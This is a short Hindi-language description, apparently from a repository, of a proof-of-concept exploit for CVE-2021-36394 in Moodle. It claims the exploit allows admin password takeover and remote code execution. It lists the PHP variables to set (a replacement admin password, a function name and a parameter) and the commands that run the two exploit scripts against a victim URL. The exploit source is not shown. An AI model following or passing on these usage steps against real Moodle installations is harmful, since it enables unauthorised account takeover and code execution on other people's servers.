
CVE-2021-36394 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Moodle में, जो कस्टम PHP फ़ंक्शन के माध्यम से एडमिन पासवर्ड अधिग्रहण और रिमोट कोड निष्पादन को सक्षम बनाता है।
कस्टम कोड
$newpassword = "Accounttakedover123";
फिर निष्पादित करें:
$ CVE2021-36394.php http://victim/path_to_moodle
कस्टम कोड
$function = "header"; $param = "Hacked: by0d0ff9";
फिर निष्पादित करें:
$ CVE2021-36394_RCE.php http://victim/path_to_moodle